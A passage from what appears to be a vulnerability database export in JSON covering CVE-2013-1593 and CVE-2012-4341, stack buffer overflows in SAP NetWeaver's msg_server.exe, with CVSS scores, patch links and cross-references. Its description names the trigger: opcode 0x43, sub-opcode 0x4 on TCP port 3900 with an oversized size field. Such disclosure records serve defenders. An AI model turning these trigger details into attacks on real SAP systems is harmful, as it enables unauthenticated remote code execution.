            "db": "ZDI",
            "id": "ZDI-12-111",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-007128",
            "trust": 0.8
          },
          {
            "db": "ZDI_CAN",
            "id": "ZDI-CAN-1396",
            "trust": 0.7
          },
          {
            "db": "ZDI_CAN",
            "id": "ZDI-CAN-1394",
            "trust": 0.7
          },
          {
            "db": "ZDI_CAN",
            "id": "ZDI-CAN-1395",
            "trust": 0.7
          },
          {
            "db": "BID",
            "id": "54229",
            "trust": 0.6
          },
          {
            "db": "BID",
            "id": "54231",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201302-368",
            "trust": 0.6
          },
          {
            "db": "IVD",
            "id": "29348194-1F62-11E6-ABEF-000C29C66E3D",
            "trust": 0.2
          },
          {
            "db": "IVD",
            "id": "29FDB3DE-1F62-11E6-ABEF-000C29C66E3D",
            "trust": 0.2
          },
          {
            "db": "PACKETSTORM",
            "id": "120350",
            "trust": 0.2
          },
          {
            "db": "VULMON",
            "id": "CVE-2013-1593",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "114279",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "29348194-1f62-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-112"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-111"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-104"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3434"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3433"
          },
          {
            "db": "VULMON",
            "id": "CVE-2013-1593"
          },
          {
            "db": "BID",
            "id": "57956"
          },
          {
            "db": "PACKETSTORM",
            "id": "120350"
          },
          {
            "db": "PACKETSTORM",
            "id": "114279"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201302-368"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-007128"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-1593"
          }
        ]
      },
      "id": "VAR-202001-0833",
      "iot": {
        "_id": null,
        "data": true,
        "sources": [
          {
            "db": "IVD",
            "id": "29348194-1f62-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3434"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3433"
          }
        ],
        "trust": 1.87111164
      },
      "iot_taxonomy": {
        "_id": null,
        "data": [
          {
            "category": [
              "ICS"
            ],
            "sub_category": null,
            "trust": 1.6
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "29348194-1f62-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3434"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3433"
          }
        ]
      },
      "last_update_date": "2026-04-10T23:58:27.923000Z",
      "patch": {
        "_id": null,
        "data": [
          {
            "title": "SAP has issued an update to correct this vulnerability.",
            "trust": 1.4,
            "url": "https://websmp230.sap-ag.de/sap(bD1lbiZjPTAwMQ==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649840"
          },
          {
            "title": "top page",
            "trust": 0.8,
            "url": "https://www.sap.com/japan/index.html"
          },
          {
            "title": "SAP has issued an update to correct this vulnerability.",
            "trust": 0.7,
            "url": "https://websmp230.sap-ag.de/sap(bD1lbiZjPTAwMQ==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649838"
          },
          {
            "title": "SAP Netweaver ABAP \u0027msg_server.exe\u0027 parameter name patch for remote code execution vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/18435"
          },
          {
            "title": "SAP Netweaver ABAP \u0027msg_server.exe\u0027 patch for buffer overflow vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/18434"
          },
          {
            "title": "SAP NetWeaver \u2018msg_server.exe\u2019 Remediation measures for remote denial of service vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=108971"
          },
          {
            "title": "martingalloar",
            "trust": 0.1,
            "url": "https://github.com/martingalloar/martingalloar "
          },
          {
            "title": "publications",
            "trust": 0.1,
            "url": "https://github.com/martingalloar/publications "
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-12-112"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-111"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-104"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3434"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3433"
          },
          {
            "db": "VULMON",
            "id": "CVE-2013-1593"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201302-368"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-007128"
          }
        ]
      },
      "problemtype_data": {
        "_id": null,
        "data": [
          {
            "problemtype": "CWE-129",
            "trust": 1.0
          },
          {
            "problemtype": "Improper validation of array index (CWE-129) [NVD Evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-007128"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-1593"
          }
        ]
      },
      "references": {
        "_id": null,
        "data": [
          {
            "trust": 2.6,
            "url": "https://www.coresecurity.com/content/sap-netweaver-msg-srv-multiple-vulnerabilities"
          },
          {
            "trust": 1.7,
            "url": "http://www.securityfocus.com/bid/57956"
          },
          {
            "trust": 1.7,
            "url": "https://packetstormsecurity.com/files/cve/cve-2013-1593"
          },
          {
            "trust": 1.7,
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/82065"
          },
          {
            "trust": 1.7,
            "url": "http://www.securitytracker.com/id/1028148"
          },
          {
            "trust": 1.5,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1593"
          },
          {
            "trust": 1.4,
            "url": "https://websmp230.sap-ag.de/sap(bd1lbizjptawmq==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649840"
          },
          {
            "trust": 0.7,
            "url": "https://websmp230.sap-ag.de/sap(bd1lbizjptawmq==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649838"
          },
          {
            "trust": 0.6,
            "url": "http://seclists.org/bugtraq/2012/jun/186"
          },
          {
            "trust": 0.6,
            "url": "http://seclists.org/bugtraq/2012/jun/185"
          },
          {
            "trust": 0.3,
            "url": "http://www.sap.com/platform/netweaver/index.epx"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/129.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://packetstormsecurity.com/files/120350/sap-netweaver-message-server-buffer-overflow.html"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/martingalloar/martingalloar"
          },
          {
            "trust": 0.1,
            "url": "http://corelabs.coresecurity.com."
          },
          {
            "trust": 0.1,
            "url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc."
          },
          {
            "trust": 0.1,
            "url": "https://service.sap.com/sap/support/notes/1800603."
          },
          {
            "trust": 0.1,
            "url": "http://corelabs.coresecurity.com/"
          },
          {
            "trust": 0.1,
            "url": "http://www.zerodayinitiative.com/advisories/zdi-12-104/."
          },
          {
            "trust": 0.1,
            "url": "http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/c2e782b8fd3020e10000000a42189d/frameset.htm."
          },
          {
            "trust": 0.1,
            "url": "http://www.sap.com/platform/netweaver/index.epx."
          },
          {
            "trust": 0.1,
            "url": "http://www.coresecurity.com."
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1592"
          },
          {
            "trust": 0.1,
            "url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
          },
          {
            "trust": 0.1,
            "url": "http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/bdc344cc104231e10000000a421937/content.htm."
          },
          {
            "trust": 0.1,
            "url": "http://www.zerodayinitiative.com/advisories/zdi-12-112/."
          },
          {
            "trust": 0.1,
            "url": "http://www.zerodayinitiative.com/advisories/zdi-12-111/."
          },
          {
            "trust": 0.1,
            "url": "http://www.zerodayinitiative.com/advisories/disclosure_policy/"
          },
          {
            "trust": 0.1,
            "url": "http://twitter.com/thezdi"
          },
          {
            "trust": 0.1,
            "url": "http://www.tippingpoint.com"
          },
          {
            "trust": 0.1,
            "url": "http://www.zerodayinitiative.com"
          },
          {
            "trust": 0.1,
            "url": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d1"
          },
          {
            "trust": 0.1,
            "url": "http://www.zerodayinitiative.com/advisories/zdi-12-104"
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-12-112"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-111"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-104"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3434"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3433"
          },
          {
            "db": "VULMON",
            "id": "CVE-2013-1593"
          },
          {
            "db": "BID",
            "id": "57956"
          },
          {
            "db": "PACKETSTORM",
            "id": "120350"
          },
          {
            "db": "PACKETSTORM",
            "id": "114279"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201302-368"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-007128"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-1593"
          }
        ]
      },
      "sources": {
        "_id": null,
        "data": [
          {
            "db": "IVD",
            "id": "29348194-1f62-11e6-abef-000c29c66e3d",
            "ident": null
          },
          {
            "db": "IVD",
            "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d",
            "ident": null
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-112",
            "ident": null
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-111",
            "ident": null
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-104",
            "ident": null
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3434",
            "ident": null
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3433",
            "ident": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2013-1593",
            "ident": null
          },
          {
            "db": "BID",
            "id": "57956",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "120350",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "114279",
            "ident": null
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201302-368",
            "ident": null
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-007128",
            "ident": null
          },
          {
            "db": "NVD",
            "id": "CVE-2013-1593",
            "ident": null
          }
        ]
      },
      "sources_release_date": {
        "_id": null,
        "data": [
          {
            "date": "2012-07-02T00:00:00",
            "db": "IVD",
            "id": "29348194-1f62-11e6-abef-000c29c66e3d",
            "ident": null
          },
          {
            "date": "2012-07-02T00:00:00",
            "db": "IVD",
            "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d",
            "ident": null
          },
          {
            "date": "2012-06-28T00:00:00",
            "db": "ZDI",
            "id": "ZDI-12-112",
            "ident": null
          },
          {
            "date": "2012-06-28T00:00:00",
            "db": "ZDI",
            "id": "ZDI-12-111",
            "ident": null
          },
          {
            "date": "2012-06-27T00:00:00",
            "db": "ZDI",
            "id": "ZDI-12-104",
            "ident": null
          },
          {
            "date": "2012-07-02T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2012-3434",
            "ident": null
          },
          {
            "date": "2012-07-02T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2012-3433",
            "ident": null
          },
          {
            "date": "2020-01-23T00:00:00",
            "db": "VULMON",
            "id": "CVE-2013-1593",
            "ident": null
          },
          {
            "date": "2013-02-13T00:00:00",
            "db": "BID",
            "id": "57956",
            "ident": null
          },
          {
            "date": "2013-02-15T23:44:44",
            "db": "PACKETSTORM",
            "id": "120350",
            "ident": null
          },
          {
            "date": "2012-06-28T03:51:55",
            "db": "PACKETSTORM",
            "id": "114279",
            "ident": null
          },
          {
            "date": "2013-02-22T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201302-368",
            "ident": null
          },
          {
            "date": "2020-02-14T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2013-007128",
            "ident": null
          },
          {
            "date": "2020-01-23T20:15:11.730000",
            "db": "NVD",
            "id": "CVE-2013-1593",
            "ident": null
          }
        ]
      },
      "sources_update_date": {
        "_id": null,
        "data": [
          {
            "date": "2012-06-28T00:00:00",
            "db": "ZDI",
            "id": "ZDI-12-112",
            "ident": null
          },
          {
            "date": "2012-06-28T00:00:00",
            "db": "ZDI",
            "id": "ZDI-12-111",
            "ident": null
          },
          {
            "date": "2012-06-27T00:00:00",
            "db": "ZDI",
            "id": "ZDI-12-104",
            "ident": null
          },
          {
            "date": "2012-07-02T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2012-3434",
            "ident": null
          },
          {
            "date": "2012-07-02T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2012-3433",
            "ident": null
          },
          {
            "date": "2020-01-31T00:00:00",
            "db": "VULMON",
            "id": "CVE-2013-1593",
            "ident": null
          },
          {
            "date": "2013-06-12T18:46:00",
            "db": "BID",
            "id": "57956",
            "ident": null
          },
          {
            "date": "2020-05-26T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201302-368",
            "ident": null
          },
          {
            "date": "2020-02-14T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2013-007128",
            "ident": null
          },
          {
            "date": "2020-01-31T16:42:13.070000",
            "db": "NVD",
            "id": "CVE-2013-1593",
            "ident": null
          }
        ]
      },
      "threat_type": {
        "_id": null,
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "120350"
          },
          {
            "db": "PACKETSTORM",
            "id": "114279"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201302-368"
          }
        ],
        "trust": 0.8
      },
      "title": {
        "_id": null,
        "data": "SAP Netweaver ABAP \u0027msg_server.exe\u0027 Parameter name remote code execution vulnerability",
        "sources": [
          {
            "db": "IVD",
            "id": "29348194-1f62-11e6-abef-000c29c66e3d"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3434"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "_id": null,
        "data": "input validation error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201302-368"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201208-0222

    Vulnerability from variot - Updated: 2026-04-10 23:58

    Multiple stack-based buffer overflows in msg_server.exe in SAP NetWeaver ABAP 7.x allow remote attackers to cause a denial of service (crash) and execute arbitrary code via a (1) long parameter value, (2) crafted string size field, or (3) long Parameter Name string in a package with opcode 0x43 and sub opcode 0x4 to TCP port 3900. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of SAP Netweaver ABAP. Authentication is not required to exploit this vulnerability. The specific flaw exists within the msg_server.exe listening on 3900 by default. When the msg_server parses a message with opcode 0x43 and sub-opcode 0x04 it uses a user suplied size field to copy a string into a static sized stack buffer. The resulting buffer overflow can lead to remote code execution under the context of the process. Authentication is not required to exploit this vulnerability.The specific flaw exists within the way SAP NetWeaver handles packages with opcode 0x43. SAP NetWeaver has a defect in the message with the opcode 0x43. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Msg_server.exe listens to port 3900 by default. Arbitrary code. NetWeaver ABAP is prone to a denial-of-service vulnerability

    Show details on source website

    {
      "affected_products": {
        "_id": null,
        "data": [
          {
            "_id": null,
            "model": "netweaver",
            "scope": null,
            "trust": 2.1,
            "vendor": "sap",
            "version": null
          },
          {
            "_id": null,
            "model": "netweaver abap",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "sap",
            "version": "7.02"
          },
          {
            "_id": null,
            "model": "netweaver abap",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "sap",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "netweaver abap",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "sap",
            "version": "7.03"
          },
          {
            "_id": null,
            "model": "netweaver abap",
            "scope": null,
            "trust": 1.2,
            "vendor": "sap",
            "version": null
          },
          {
            "_id": null,
            "model": "netweaver abap",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sap",
            "version": "7.x"
          },
          {
            "_id": null,
            "model": "netweaver abap null",
            "scope": "eq",
            "trust": 0.4,
            "vendor": "sap",
            "version": "*"
          },
          {
            "_id": null,
            "model": "netweaver abap sp4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sap",
            "version": "7.03"
          },
          {
            "_id": null,
            "model": "netweaver abap sp6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sap",
            "version": "7.02"
          },
          {
            "_id": null,
            "model": "netweaver abap sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sap",
            "version": "7.0"
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "29348194-1f62-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-112"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-111"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-104"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3434"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3433"
          },
          {
            "db": "BID",
            "id": "78143"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201208-264"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2012-003710"
          },
          {
            "db": "NVD",
            "id": "CVE-2012-4341"
          }
        ]
      },
      "configurations": {
        "_id": null,
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/a:sap:netweaver_abap",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2012-003710"
          }
        ]
      },
      "credits": {
        "_id": null,
        "data": "e6af8de8b1d4b2b6d5ba2610cbf9cd38",
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-12-112"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-111"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-104"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201206-539"
          }
        ],
        "trust": 2.7
      },
      "cve": "CVE-2012-4341",
      "cvss": {
        "_id": null,
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2012-4341",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.9,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "ZDI",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "ZDI-12-112",
                "impactScore": 8.5,
                "integrityImpact": "PARTIAL",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "HIGH",
                "trust": 0.7,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:C",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "ZDI",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "ZDI-12-111",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "HIGH",
                "trust": 0.7,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "ZDI",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "ZDI-12-104",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "HIGH",
                "trust": 0.7,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": null,
                "accessVector": null,
                "authentication": null,
                "author": "IVD",
                "availabilityImpact": null,
                "baseScore": null,
                "confidentialityImpact": null,
                "exploitabilityScore": null,
                "id": "29348194-1f62-11e6-abef-000c29c66e3d",
                "impactScore": null,
                "integrityImpact": null,
                "severity": null,
                "trust": 0.2,
                "vectorString": null,
                "version": "unknown"
              },
              {
                "accessComplexity": null,
                "accessVector": null,
                "authentication": null,
                "author": "IVD",
                "availabilityImpact": null,
                "baseScore": null,
                "confidentialityImpact": null,
                "exploitabilityScore": null,
                "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d",
                "impactScore": null,
                "integrityImpact": null,
                "severity": null,
                "trust": 0.2,
                "vectorString": null,
                "version": "unknown"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2012-4341",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "CVE-2012-4341",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "ZDI",
                "id": "ZDI-12-112",
                "trust": 0.7,
                "value": "HIGH"
              },
              {
                "author": "ZDI",
                "id": "ZDI-12-111",
                "trust": 0.7,
                "value": "HIGH"
              },
              {
                "author": "ZDI",
                "id": "ZDI-12-104",
                "trust": 0.7,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201208-264",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "IVD",
                "id": "29348194-1f62-11e6-abef-000c29c66e3d",
                "trust": 0.2,
                "value": "HIGH"
              },
              {
                "author": "IVD",
                "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d",
                "trust": 0.2,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2012-4341",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "29348194-1f62-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-112"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-111"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-104"
          },
          {
            "db": "VULMON",
            "id": "CVE-2012-4341"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201208-264"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2012-003710"
          },
          {
            "db": "NVD",
            "id": "CVE-2012-4341"
          }
        ]
      },
      "description": {
        "_id": null,
        "data": "Multiple stack-based buffer overflows in msg_server.exe in SAP NetWeaver ABAP 7.x allow remote attackers to cause a denial of service (crash) and execute arbitrary code via a (1) long parameter value, (2) crafted string size field, or (3) long Parameter Name string in a package with opcode 0x43 and sub opcode 0x4 to TCP port 3900. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of SAP Netweaver ABAP. Authentication is not required to exploit this vulnerability. The specific flaw exists within the msg_server.exe listening on 3900 by default. When the msg_server parses a message with opcode 0x43 and sub-opcode 0x04 it uses a user suplied size field to copy a string into a static sized stack buffer. The resulting buffer overflow can lead to remote code execution under the context of the process. Authentication is not required to exploit this vulnerability.The specific flaw exists within the way SAP NetWeaver handles packages with opcode 0x43. SAP NetWeaver has a defect in the message with the opcode 0x43. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Msg_server.exe listens to port 3900 by default. Arbitrary code. NetWeaver ABAP is prone to a denial-of-service vulnerability",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2012-4341"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2012-003710"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-112"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-111"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-104"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3434"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3433"
          },
          {
            "db": "BID",
            "id": "78143"
          },
          {
            "db": "IVD",
            "id": "29348194-1f62-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
          },
          {
            "db": "VULMON",
            "id": "CVE-2012-4341"
          }
        ],
        "trust": 5.31
      },
      "external_ids": {
        "_id": null,
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2012-4341",
            "trust": 2.8
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-112",
            "trust": 2.7
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-111",
            "trust": 2.7
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-104",
            "trust": 2.7
          },
          {
            "db": "SECTRACK",
            "id": "1027211",
            "trust": 2.0
          },
          {
            "db": "SECUNIA",
            "id": "49744",
            "trust": 1.7
          },
          {
            "db": "BID",
            "id": "54229",
            "trust": 1.2
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3434",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3433",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2012-003710",
            "trust": 0.8
          },
          {
            "db": "ZDI_CAN",
            "id": "ZDI-CAN-1396",
            "trust": 0.7
          },
          {
            "db": "ZDI_CAN",
            "id": "ZDI-CAN-1394",
            "trust": 0.7
          },
          {
            "db": "ZDI_CAN",
            "id": "ZDI-CAN-1395",
            "trust": 0.7
          },
          {
            "db": "BID",
            "id": "54231",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201208-264",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201206-539",
            "trust": 0.6
          },
          {
            "db": "BID",
            "id": "78143",
            "trust": 0.4
          },
          {
            "db": "IVD",
            "id": "29348194-1F62-11E6-ABEF-000C29C66E3D",
            "trust": 0.2
          },
          {
            "db": "IVD",
            "id": "29FDB3DE-1F62-11E6-ABEF-000C29C66E3D",
            "trust": 0.2
          },
          {
            "db": "VULMON",
            "id": "CVE-2012-4341",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "29348194-1f62-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-112"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-111"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-104"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3434"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3433"
          },
          {
            "db": "VULMON",
            "id": "CVE-2012-4341"
          },
          {
            "db": "BID",
            "id": "78143"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201208-264"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201206-539"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2012-003710"
          },
          {
            "db": "NVD",
            "id": "CVE-2012-4341"
          }
        ]
      },
      "id": "VAR-201208-0222",
      "iot": {
        "_id": null,
        "data": true,
        "sources": [
          {
            "db": "IVD",
            "id": "29348194-1f62-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3434"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3433"
          }
        ],
        "trust": 1.87111164
      },
      "iot_taxonomy": {
        "_id": null,
        "data": [
          {
            "category": [
              "ICS"
            ],
            "sub_category": null,
            "trust": 1.6
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "29348194-1f62-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3434"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3433"
          }
        ]
      },
      "last_update_date": "2026-04-10T23:58:27.850000Z",
      "patch": {
        "_id": null,
        "data": [
          {
            "title": "SAP has issued an update to correct this vulnerability.",
            "trust": 1.4,
            "url": "https://websmp230.sap-ag.de/sap(bD1lbiZjPTAwMQ==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649840"
          },
          {
            "title": "Acknowledgments to Security Researchers",
            "trust": 0.8,
